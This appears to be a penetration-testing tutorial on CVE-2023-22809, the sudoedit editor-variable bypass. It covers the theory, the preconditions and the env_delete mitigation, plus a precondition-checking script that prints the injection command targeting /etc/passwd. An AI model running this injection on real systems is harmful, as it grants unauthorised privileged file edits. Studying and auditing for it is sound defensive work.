Sudoedit Bypass

CVE-2023-22809

Theory

Sudo uses user-provided environment variables to let its users select their editor of choice. The content of these variables extends the actual command passed to the sudo_edit() function. However, the latter relies on the presence of the -- argument to determine the list of files to edit. The injection of an extra -- argument in one of the authorized environment variables can alter this list and lead to privilege escalation by editing any other file with privileges of the RunAs user. This issue occurs after the sudoers policy validation. - Synacktiv

The vulnerability affects sudo versions 1.8.0 through 1.9.12p1; it is fixed in 1.9.12p2.

Practice

To exploit it, the installed sudo must be in the vulnerable range (1.8.0 to 1.9.12p1):

$ sudo -V
Sudo version 1.8.0

The user must be allowed by the sudoers policy to run sudoedit on at least one file (any file, since the injected `--` adds further files to the list):

$ sudo -l
[sudo] password for user:
Matching Defaults entries for user on vulnserver:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User user may run the following commands on vulnserver:
    (ALL:ALL) sudoedit /etc/custom/service.conf

Finally, the policy must not strip the editor variables sudoedit reads (SUDO_EDITOR, VISUAL, EDITOR). The following Defaults entry is the usual hardening against this issue; if it shows up among the matching Defaults entries of `sudo -l`, the injection through those variables is blocked:

env_delete+="SUDO_EDITOR VISUAL EDITOR"
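The checks above can be scripted against captured `sudo -V` and `sudo -l` output, which is useful when triaging many hosts. The script below is an added example and is not code from the original page or from Synacktiv: it compares the version against the page's vulnerable range, looks for a sudoedit rule, lists which editor variables survive `env_delete`, and prints (without running) the command line that carries the extra `--` described in the Theory section. It assumes that `sudo -l` prints a matching `env_delete` Default in the same form as in sudoers (`env_delete+="A B C"`); the editor `vi` and the target `/etc/passwd` are illustrative choices only.

```shell
#!/bin/sh
# Added example, not code from the original page or from Synacktiv: offline
# precondition checks for CVE-2023-22809 against captured `sudo -V` / `sudo -l`
# text, plus the shape of the editor value that injects the extra "--".
# Assumptions: `sudo -l` prints a matching env_delete Default in the same
# form as in sudoers (env_delete+="A B C"); the editor name "vi" and the
# target /etc/passwd are illustrative only.

# Turn "1.9.12p1" into an integer so versions compare numerically.
sudo_version_key() {
    base=${1%%p*}
    case "$1" in
        *p*) plevel=${1##*p} ;;
        *)   plevel=0 ;;
    esac
    major=${base%%.*}
    rest=${base#*.}
    minor=${rest%%.*}
    patch=${rest#*.}
    if [ "$patch" = "$rest" ]; then patch=0; fi   # "1.8" with no patch field
    echo $(( major * 1000000 + minor * 10000 + patch * 100 + plevel ))
}

# Vulnerable range stated on the page: 1.8.0 through 1.9.12p1 inclusive.
is_vulnerable_version() {
    key=$(sudo_version_key "$1")
    [ "$key" -ge "$(sudo_version_key 1.8.0)" ] && [ "$key" -le "$(sudo_version_key 1.9.12p1)" ]
}

# $1: full `sudo -V` output; prints the version token from its first line.
sudo_version_from_output() {
    printf '%s\n' "$1" | awk 'NR == 1 && $1 == "Sudo" && $2 == "version" { print $3 }'
}

# $1: full `sudo -l` output; true if some rule grants sudoedit.
sudoedit_rule_present() {
    printf '%s\n' "$1" | grep -Eq '^[[:space:]]*\([^)]*\)[[:space:]]+(NOPASSWD:[[:space:]]*)?sudoedit([[:space:]]|$)'
}

# $1: full `sudo -l` output; prints, in sudo's lookup order, each editor
# variable that env_delete does not remove (empty output = fully mitigated).
usable_editor_vars() {
    for v in SUDO_EDITOR VISUAL EDITOR; do
        if ! printf '%s\n' "$1" | grep -Eq 'env_delete\+?="([^"]*[[:space:]])?'"$v"'([[:space:]][^"]*)?"'; then
            echo "$v"
        fi
    done
    return 0
}

# $1: `sudo -V` text, $2: `sudo -l` text. Prints the first usable editor
# variable and returns 0 when every precondition holds; returns 1 otherwise.
exploit_preconditions() {
    ver=$(sudo_version_from_output "$1")
    [ -n "$ver" ] && is_vulnerable_version "$ver" || return 1
    sudoedit_rule_present "$2" || return 1
    var=$(usable_editor_vars "$2" | head -n 1)
    [ -n "$var" ] || return 1
    echo "$var"
}

# Constructed sample input, copied from the page's command output.
SAMPLE_V='Sudo version 1.8.0'
SAMPLE_L='Matching Defaults entries for user on vulnserver:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User user may run the following commands on vulnserver:
    (ALL:ALL) sudoedit /etc/custom/service.conf'
# The same policy with the env_delete hardening appended (constructed).
HARDENED_L=$(printf '%s\n' "$SAMPLE_L" | sed 's/use_pty$/use_pty, env_delete+="SUDO_EDITOR VISUAL EDITOR"/')

# Shape of the injected value: the editor, a second "--", then a file the
# sudoers rule never authorised. Only the command line is printed here.
if var=$(exploit_preconditions "$SAMPLE_V" "$SAMPLE_L"); then
    printf '%s\n' "${var}='vi -- /etc/passwd' sudoedit /etc/custom/service.conf"
fi
```

Run it as `sh check.sh` on the sample data, or replace `SAMPLE_V` and `SAMPLE_L` with `"$(sudo -V)"` and `"$(sudo -l)"` on a target. An empty result from `usable_editor_vars` means the Defaults entry removes all three variables and this vector is closed; a partially hardened policy (for example only `EDITOR` deleted) still leaves `SUDO_EDITOR` and `VISUAL`, which sudo consults first.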
